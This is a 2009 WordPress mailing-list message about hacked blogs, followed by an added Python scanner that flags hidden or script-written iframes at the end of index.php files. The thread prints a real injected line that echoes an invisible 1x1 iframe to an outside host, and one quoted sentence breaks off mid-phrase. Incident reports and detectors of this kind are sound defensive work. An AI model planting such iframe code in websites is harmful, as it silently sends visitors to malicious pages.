[wp-hackers] Hacked blogs

Peter van der Does peter at avirtualhome.com
Thu Mar 26 16:25:41 GMT 2009

On Thu, 26 Mar 2009 13:56:27 +0100
Joost de Valk <joost at yoast.com> wrote:

> Harish Narayanan wrote:
> > Joost de Valk wrote:
> >> Hey guys,
> >>
> >> I've been restoring 5 hacked blogs the last few days, all running
> >> 2.7.1 but spread over different hosts, can't find the hole yet
> >> that they're getting in through, but I'd thought I'd send out a
> >> warning to all of you that something seems to be wrong...
> >
> > Even if you aren't aware of the cause, could you point us to the
> > symptoms so we would know what to look for?
> >
> > Thanks,
> > Harish
> >
>
> Sorry, should have included that immediately.
> Symptoms were, in all cases, iframes being added to the end of all
> index.php files in the blogs, in the footer. In some cases they were
> written with javascript, in other cases they were pure iframes.
> Best,
> Joost

A similar situation was reported on December 22, 2008 by madalin
Yes, that's exactly what I am saying. Here is my index.php:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

The echo was commented out to keep for future reference according to the

No final verdict was given. The iframe was also found in
non-WordPress-related sites.

Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
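
The symptom described in this thread (iframes appended to the end of index.php files, either as plain markup or written by JavaScript) can be checked for across a web root. The following is an added example, not code from anyone in the thread; the regex heuristics, the 2048-character tail window and the example.invalid samples are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

TAIL_CHARS = 2048  # assumption: the injections described sit at the end of the file
IFRAME = re.compile(r"<\s*iframe\b[^>]*>", re.I)
# Invisible-frame hints: 0/1 pixel size or CSS hiding (quotes may be PHP-escaped)
HIDDEN = re.compile(
    r"(?:width|height)\s*=\s*\\?[\"']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none",
    re.I)
JS_WRITER = re.compile(r"document\.write(?:ln)?\s*\(", re.I)

def tail_findings(source):
    """Return heuristic findings for the last TAIL_CHARS characters of a file."""
    tail = source[-TAIL_CHARS:]
    findings = ["hidden iframe" if HIDDEN.search(tag) else "iframe"
                for tag in IFRAME.findall(tail)]
    if JS_WRITER.search(tail):
        findings.append("script-written markup")
    return findings

def scan_tree(root):
    """Map each index.php under root to its findings; clean files are omitted."""
    report = {}
    for path in sorted(Path(root).rglob("index.php")):
        found = tail_findings(path.read_text(errors="replace"))
        if found:
            report[path.relative_to(root).as_posix()] = found
    return report

# Constructed samples (example.invalid is a placeholder, not an indicator from the thread)
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
PURE = CLEAN + ('echo "<iframe src=\\"http://example.invalid/?click=1\\" width=1 height=1 '
                'style=\\"visibility:hidden;position:absolute\\"></iframe>";\n')
SCRIPTED = CLEAN + "?><script>document.write('<ifr'+'ame src=//example.invalid>');</script>\n"

def demo():
    """Build a throwaway tree with one clean and two modified files, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("index.php", CLEAN), ("a/index.php", PURE), ("b/index.php", SCRIPTED)):
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(root)

if __name__ == "__main__":
    for name, found in demo().items():
        print(name, found)
```

Findings are leads for manual review: a theme's index.php may legitimately embed a visible iframe or use document.write, so compare flagged files against a known-good copy.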
